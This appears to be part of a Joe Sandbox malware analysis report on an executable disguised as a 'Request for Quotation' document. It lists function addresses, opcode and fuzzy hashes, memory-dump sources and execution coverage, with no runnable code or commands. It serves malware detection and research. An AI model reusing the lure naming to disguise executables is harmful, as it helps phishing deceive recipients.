Snapshot File: hcaresult_0_2_125d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 543e7a02f0367113bd2462ed4c59f78db1e109c49054eecab91554663767c62c
Instruction ID: 18517812696b5c11b876fdfd5546b3493172395e815881efc3cd765cf4e4ab28
Opcode Fuzzy Hash: 543e7a02f0367113bd2462ed4c59f78db1e109c49054eecab91554663767c62c
Instruction Fuzzy Hash: DA213371510248DFDB41DF94E8C0B26BF65FB88318F24C169ED090B246C336D446CAA2

Function 0126D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1412473535.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_126d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa696aceb696e8a36c1f2ed5bbe49a3dc4413321790b1ec4e30eb1fb8b2c6ea8
Instruction ID: 59c464781750d5adc320c975d347609a5e12df5a945f1c6199f4d3dd7f8b7fec
Opcode Fuzzy Hash: fa696aceb696e8a36c1f2ed5bbe49a3dc4413321790b1ec4e30eb1fb8b2c6ea8
Instruction Fuzzy Hash: 7F21037161424CDFDB01DF94C5C0B25BB69FB84224F24C5ADD9894B283C376D886CA61

Function 0126D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1412473535.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_126d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c5143b36ed44ab930d8bc3322deff6d1593a464979a9b56e1101529ba972e59
Instruction ID: d085969befbd2802770f33866bf3c32f0a978f016298a102fa71e74ea4c3ffc6
Opcode Fuzzy Hash: 2c5143b36ed44ab930d8bc3322deff6d1593a464979a9b56e1101529ba972e59
Instruction Fuzzy Hash: F921337161434CDFDB10DF54D4C0B26BB69EB84314F24C569D98A0B2C2C377D487CAA1

Function 0125D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1412338091.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction ID: f55a9fe3c3ca9b1a61a8e3f37fb40d117370197f36ffe92dff729d6fef36c0f1
Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction Fuzzy Hash: 0111DF76404284CFCB12CF54D5C0B16BF71FB84328F24C6A9DD090B656C336D45ACBA1

Function 0126D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1412473535.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_126d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction ID: f5f19294c7fa5d51a3ae21c659fcf5a5b1e9e8822ee3aed5bdf65cb0e84fddd1
Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction Fuzzy Hash: 1811BE75604288CFCB12CF54D5C4B15BB61FB84314F24C6AAD9494B696C33BD44ACBA1

Function 0126D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1412473535.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_126d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction ID: a75c489d0f41204540cb64855f595d240a0398ae853c693686dd0a79101e7f2f
Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction Fuzzy Hash: 5511BB75604288DFDB12CF54C5C0B15BBA1FB84224F28C6AAD9894B697C33AD48ACB61

Function 0125D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1412338091.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6baed16f7c67a649311011fdb6e08928cbffecfd6cab4a9e71d71c7ba4e7b72e
Instruction ID: 0df6de14f48244e901ceaff5a1b092786336b96d0e1811b919cb93adb2bb378d
Opcode Fuzzy Hash: 6baed16f7c67a649311011fdb6e08928cbffecfd6cab4a9e71d71c7ba4e7b72e
Instruction Fuzzy Hash: 4301D631114388DFF7589BAADDC4B66FFD8DF41221F18C45AEE094A286D7799840CAB2

Function 0125D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1412338091.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5386360f11cce70ea45fefafab47afde2502b23f1b7c29c451a7a10f90e027b5
Instruction ID: bbf9b6fe04ebbd27a664591751bdf7e6418bbc0d623fb673a1247282958134f1
Opcode Fuzzy Hash: 5386360f11cce70ea45fefafab47afde2502b23f1b7c29c451a7a10f90e027b5
Instruction Fuzzy Hash: 6FF0F6320043849FF7148A0ADDC4B62FFE8EF40634F18C45AEE080B287C3799840CAB1

Non-executed Functions

Function 074173A8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

3/ev, xrefs: 07417403

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: 3/ev
API String ID: 0-1361560165
Opcode ID: 21ee13be5a0d45f66ff4f7b03a69d28d8d90d82c19c695741a50162811fd9b47
Instruction ID: 80865f3e0ea09323fe17f46a6dfbad945faf6bb628006a5bf81926afbeb9e546
Opcode Fuzzy Hash: 21ee13be5a0d45f66ff4f7b03a69d28d8d90d82c19c695741a50162811fd9b47
Instruction Fuzzy Hash: 8DE1F5B4E102198FDB15DFA8C580AAEFBF2FB89304F24816AD414AB355D734AD41CFA5

Function 07414F18 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad4615ce531c3c758e2d6526cd5b16fdc2d603d76ab83eefe4bcf1d61aff989
Instruction ID: 617ebf77eb8b593ca9fdf10f95850ec3b0effb25a00f0f14af1967950239c206
Opcode Fuzzy Hash: 5ad4615ce531c3c758e2d6526cd5b16fdc2d603d76ab83eefe4bcf1d61aff989
Instruction Fuzzy Hash: DFE1F4B4E102198FDB14DFA8C580AEEFBB2FB89305F24816AD414AB355D734AD41CFA5

Function 07416E98 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d102f75b3ac57083979424e5a7f0466a1bcc610144488734d005fc26a7b8877
Instruction ID: e53506f37ac0292461fbf17a45c168bbefadc35598fcb4857bd4a013c32ee299
Opcode Fuzzy Hash: 2d102f75b3ac57083979424e5a7f0466a1bcc610144488734d005fc26a7b8877
Instruction Fuzzy Hash: ABE1F7B4E102198FDB15DFA8C580AAEFBB2FF89305F24816AD404A7355DB349D41CFA5

Function 07415350 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3957e2e9ec86a382768b64d46466a2d99dcbc3b453662e776cb12b1723f2b208
Instruction ID: a9f3e9bf135517b19c876e67ab3dab89b75a957af3c1eb4d2e4e2da823804cf4
Opcode Fuzzy Hash: 3957e2e9ec86a382768b64d46466a2d99dcbc3b453662e776cb12b1723f2b208
Instruction Fuzzy Hash: C0E1F4B4E102198FDB14DFA8C580AEEFBB2FB89301F24816AD414AB355D734AD41CFA5

Function 07414AE0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efe9ce38e30d468234e11b5d96eb68b4fd069375dc83b26559f0cd6aeca7ca82
Instruction ID: 725a0ba4d0e164c0bf449890cd98819da502c571a93f1e3012102e5921e1eee2
Opcode Fuzzy Hash: efe9ce38e30d468234e11b5d96eb68b4fd069375dc83b26559f0cd6aeca7ca82
Instruction Fuzzy Hash: 9DE104B4E102598FDB14DFA8C580AAEFBF2FB89305F24816AD414AB315D734AD41CFA5

Function 0153D51C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 254a590775907e89b989050b3e9c69994a6bbb05c3d29e11214ec90aa40b5e26
Instruction ID: 9cbf0ac4621158cf2849c4692e085323b6d0212c93b75bce5eee7ff9401d0187
Opcode Fuzzy Hash: 254a590775907e89b989050b3e9c69994a6bbb05c3d29e11214ec90aa40b5e26
Instruction Fuzzy Hash: 7DA16036E0020A8FCF05DFB8D94099EBBB2FFC5300B15856AE905AF265DB75D916CB80

Function 07416E8A Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7597337a044a80ffb4193d26ea124f31b6197d32749c2d146e2dcd0aa33ea0c
Instruction ID: 8198157b1f96a0dbfc763d60be70942aee7796e98fc6ef37fd37c646383e70fc
Opcode Fuzzy Hash: f7597337a044a80ffb4193d26ea124f31b6197d32749c2d146e2dcd0aa33ea0c
Instruction Fuzzy Hash: 8D5107B0E102198FDB15DFA9C9805EEFBF2EF89304F24816AD418A7316DB359941CFA5

Analysis Process: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exePID: 7264, Parent PID: 2440COMMON

Execution Graph

Execution Coverage:	17.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	14.7%
Total number of Nodes:	34
Total number of Limit Nodes:	5

Executed Functions

Function 06DE9548 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.3842296194.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6de0000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7103df61cabb73aae503558b1b8d1565947f8ca97fd6c27b6ad6b012f3513c0a
Instruction ID: 187381d173fd3805d892bccb1fa258885340237aa3b0a7cfc3b88ed293e6d389
Opcode Fuzzy Hash: 7103df61cabb73aae503558b1b8d1565947f8ca97fd6c27b6ad6b012f3513c0a
Instruction Fuzzy Hash: 4CF1F374E01218CFDB64DFA9D894B9DFBB2BF88304F1481A9E848AB355DB709985CF50

Function 0162A088 Relevance: .9, Instructions: 891COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f4c672d7bde9fbf9537c15df48561e72469350e0709e97de438293190a52de
Instruction ID: 616813f311039bfb8d251716b6fdd45b679a414c650089f7cd10b3ed80fa61c2
Opcode Fuzzy Hash: 44f4c672d7bde9fbf9537c15df48561e72469350e0709e97de438293190a52de
Instruction Fuzzy Hash: D0826C31A00A1ADFCB15CFA8CD84AAEBBB2FF88310F158559E9059B765D7B0E941CF50

Function 016269A0 Relevance: .5, Instructions: 510COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcbf582ffbd9dd13e211c4119e457ff9646235116636868eb4a3f7048ade1f38
Instruction ID: dae0c8146ecf13a232daf20eae5483d232824336769340b55b40b13c0b1ab1a6
Opcode Fuzzy Hash: dcbf582ffbd9dd13e211c4119e457ff9646235116636868eb4a3f7048ade1f38
Instruction Fuzzy Hash: 31128C71A006198FDB14DF69CC54BAEBBB6FF88300F108569E906AB395DB349D42CF90

Function 01626FC8 Relevance: .5, Instructions: 501
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4ffe41341f7ec74e98b507b7915c72aeb47beb7fbe881fdbe2c477f88844df3
Instruction ID: 4c91a55a9870e0faebd02fbfe0f327c286d8900019163331da67a132b074e5bd
Opcode Fuzzy Hash: d4ffe41341f7ec74e98b507b7915c72aeb47beb7fbe881fdbe2c477f88844df3
Instruction Fuzzy Hash: 76123870A01629CFDB15CF69CC84EAEBBB2BF98304F158069E905AB361DB35E941CF50

Function 016229EC Relevance: .4, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0347abd8be8ad5056e42e5f10565d3856b6be65f873d66ef2c7ac4664beb786f
Instruction ID: 66cc32353291a34465060c46800b33ebe8090a94156a125067db9e9547e44fdd
Opcode Fuzzy Hash: 0347abd8be8ad5056e42e5f10565d3856b6be65f873d66ef2c7ac4664beb786f
Instruction Fuzzy Hash: 57D1E3339486958FC721CF78E8E1B59BBB5FB4B304F1845ADC4249B621CB39A841CF61

Function 0162C468 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f84e117b98f081d0db47cb715dc4f85587f8c6a85e561f657c23e3e340088a
Instruction ID: 9c507de470996560e17be108873204756a45d17ce30bc1f9c97d6d59e4377303
Opcode Fuzzy Hash: e5f84e117b98f081d0db47cb715dc4f85587f8c6a85e561f657c23e3e340088a
Instruction Fuzzy Hash: C891D674E00628CFEB18DFAAD844B9DBBF2BF89300F148069E819AB355DB749945CF50

Function 0162C19B Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 442da85fee9ba6c8a60e89cfbd30813d59692d08d9897c5d89ae590d6f2fd1c6
Instruction ID: 719bd16437cc966029baaf8085689b00b2e2da0bc1ab2584dd078eb3155149cc
Opcode Fuzzy Hash: 442da85fee9ba6c8a60e89cfbd30813d59692d08d9897c5d89ae590d6f2fd1c6
Instruction Fuzzy Hash: F181B274E00618CFEB14DFAAD844A9DBBF2BF89300F14C06AE819AB365DB749945CF51

Function 01625362 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d06810d228f4c41b16c4aaae31171faa5098fdf7ad0313fd57fdede8f421c1a
Instruction ID: 14e943b82a92332586c789e8c22ae5c6e092994d42d3b0978e6c38cfaca9959b
Opcode Fuzzy Hash: 6d06810d228f4c41b16c4aaae31171faa5098fdf7ad0313fd57fdede8f421c1a
Instruction Fuzzy Hash: D991C174E01618CFDB28CFA9D884A9DBBF2BF89311F158069E809BB365DB349945CF50

Function 0162CA08 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac52f23a19f8563c347e0d3e53b4d2a14ff7910f26f7971ac2d48f681b5ecc8c
Instruction ID: dfca91cc9115f36ff0544843dab56e144179fe0ad1411865673815a9b63b4014
Opcode Fuzzy Hash: ac52f23a19f8563c347e0d3e53b4d2a14ff7910f26f7971ac2d48f681b5ecc8c
Instruction Fuzzy Hash: F381C274E00618CFEB14DFAAD884A9DBBF2BF88301F148069E819AB365DB349945DF50

Function 0162D278 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82a061692544cd15813ee760f05a3e49f4d438b21dccb81018b29c0aba781d67
Instruction ID: df5c45395600fa35896a8a63a8738f9dbf05a6ef3f9ebca159df1f4bc1ae3f18
Opcode Fuzzy Hash: 82a061692544cd15813ee760f05a3e49f4d438b21dccb81018b29c0aba781d67
Instruction Fuzzy Hash: F581C374E01618CFEB14DFAAD884A9DBBF2BF89300F14C069E819AB365DB349945CF50

Function 0162CCD8 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8e8e34f385416a18dbd749942e86b00d38beff1c1b06f0a507afbc69a70fe63
Instruction ID: 4fb50c7a689d40b170dd4d88878a4f27cd19c8ab7e0380c132c05aec33c5a127
Opcode Fuzzy Hash: f8e8e34f385416a18dbd749942e86b00d38beff1c1b06f0a507afbc69a70fe63
Instruction Fuzzy Hash: A981B274E00618CFEB14DFAAD884A9DBBF2BF88300F14C069E819AB365DB749945CF51

Function 0162C738 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d78767f175c4d64b4ff9a90977478b78f60616ef19e6451b60d6fcbb2a8f1a83
Instruction ID: ce2580274c3fd93695564d2bea00525a5a8346ebfaf28bbe3856c8b53844db98
Opcode Fuzzy Hash: d78767f175c4d64b4ff9a90977478b78f60616ef19e6451b60d6fcbb2a8f1a83
Instruction Fuzzy Hash: 1D81B074E00618CFEB14DFAAD984A9DBBF2BF88300F15C069E819AB365DB749945CF50

Function 0162CFAC Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f6ad1f045e18b5fe98b9913fe7736028a6953526b578ce8056f7d3fb6ee768
Instruction ID: 6058dfdff6d637f0a8606abbe472c2576f790ec823e8d2e1b9abc42312d704f1
Opcode Fuzzy Hash: 36f6ad1f045e18b5fe98b9913fe7736028a6953526b578ce8056f7d3fb6ee768
Instruction Fuzzy Hash: 9281A674E00618CFDB14DFA9D944A9DBBF2BF88311F24C069D819AB365DB349945CF50

Function 0162E97C Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d81646dd6dc8fe4878531dcd4e1d46833a7111e2816f1cef794f79fac53c5a9
Instruction ID: 3320c943eba7287d77efe3350d23e120f10f35dd57e4ffc8d9860622bca9acb9
Opcode Fuzzy Hash: 3d81646dd6dc8fe4878531dcd4e1d46833a7111e2816f1cef794f79fac53c5a9
Instruction Fuzzy Hash: 1651B774E00618DFEB18DFAAD884A9DBBB2FF89300F24C029E815AB365DB315941CF14

Function 0162E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 685d44337db5ee058bbbb1b14fc76ec8e5473f2b9a5eec9f72bd3f2389b6d843
Instruction ID: e60759142d7c16dadf6a04dabbc0752ff4ef3f1908c2c0188e053b4be9908fbf
Opcode Fuzzy Hash: 685d44337db5ee058bbbb1b14fc76ec8e5473f2b9a5eec9f72bd3f2389b6d843
Instruction Fuzzy Hash: AC519674E00618DFEB18DFAAD994A9DBBF2BF89300F24C029E815AB364DB355941CF14

Function 0162D548 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df48460e7dac0ef8ec634f34abb3934aee6684f3058428dcd4a9564152e19eb8
Instruction ID: 4216609b1c1cf4eff32fc97717fc092d3160494cd7860807fda1b40e66a7c976
Opcode Fuzzy Hash: df48460e7dac0ef8ec634f34abb3934aee6684f3058428dcd4a9564152e19eb8
Instruction Fuzzy Hash: 2451A474E01218DFDB54DFA9D98499DBBF2FF89300F20816AE819AB364DB31A905CF50

Function 06DE992C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 06DE9A6E

Memory Dump Source

Source File: 00000009.00000002.3842296194.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6de0000_Request for Quotation MK FMHS.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 517863071ab3c08a6dec65c84fe08c13e78a29e0e4c1ca5577fc61e17ae1f5ca
Instruction ID: 515f93f3ec89184b10694e3b3dbbfa48eb95296e6534d4417938b8d3c0e27d40
Opcode Fuzzy Hash: 517863071ab3c08a6dec65c84fe08c13e78a29e0e4c1ca5577fc61e17ae1f5ca
Instruction Fuzzy Hash: C0115974E412099FEB54EBA8E894EADB7F5FF88314F148169E844AB241DB30E941CB64

Function 01628490 Relevance: .7, Instructions: 698
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f36dde6a973cebb665504b43ec9461d6d159a38a6c602123a7cbe5165d1be0a
Instruction ID: 8077c04804a0ab9d07ded93a5afd72f5c9df889c91aa83b3dbb764e7fe50f142
Opcode Fuzzy Hash: 2f36dde6a973cebb665504b43ec9461d6d159a38a6c602123a7cbe5165d1be0a
Instruction Fuzzy Hash: 41521E74A002198FEB15DBA4CC60BAEB7B6FF98300F1080ADD60A6B395CB359E45DF55

Function 0162E007 Relevance: .7, Instructions: 652
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab65811cb63e336dccdc728e5dbafb19061d4d4172c6dfc7636de2641252fce3
Instruction ID: 240ccc64d60baa5393ed0741424fb6a47d68980ef53f6708318a1150d1ea7597
Opcode Fuzzy Hash: ab65811cb63e336dccdc728e5dbafb19061d4d4172c6dfc7636de2641252fce3
Instruction Fuzzy Hash: 3812AB750217528FEB61AF74EEBC02ABA64FB1F367B04BD81E01BC10499B721664CF61

Function 0162E018 Relevance: .6, Instructions: 647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd91dd3e648a1077a1de069f5a8a6c64c7125cab4cab2641170e20194f2de109
Instruction ID: ba6598814f11868f34b17e4557392358ec33ea9f8f152723e8b6c755ebac9ee8
Opcode Fuzzy Hash: fd91dd3e648a1077a1de069f5a8a6c64c7125cab4cab2641170e20194f2de109
Instruction Fuzzy Hash: C712AA750217128FEB61AF74EEBC12ABA64FB1F367B04BD81E01B814499F721264CF61

Function 01620C8F Relevance: .5, Instructions: 544
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.3828098583.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1620000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42b39d511f4fcd7a0f96ca98758d6fa6e894fbc313bc8f9208bd6f670e4f4673
Instruction ID: b30a940fe827ce4af6d5598fd17246f9884ebf9281c6e830afeb372c899e240d
Opcode Fuzzy Hash: 42b39d511f4fcd7a0f96ca98758d6fa6e894fbc313bc8f9208bd6f670e4f4673
Instruction Fuzzy Hash: 4E52C374A01219CFCB64DF24ED94B9DB7B2FB48301F1092A9D809A7354DB386E89CF91

Function 01620CA0 Relevance: .5, Instructions: 539
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

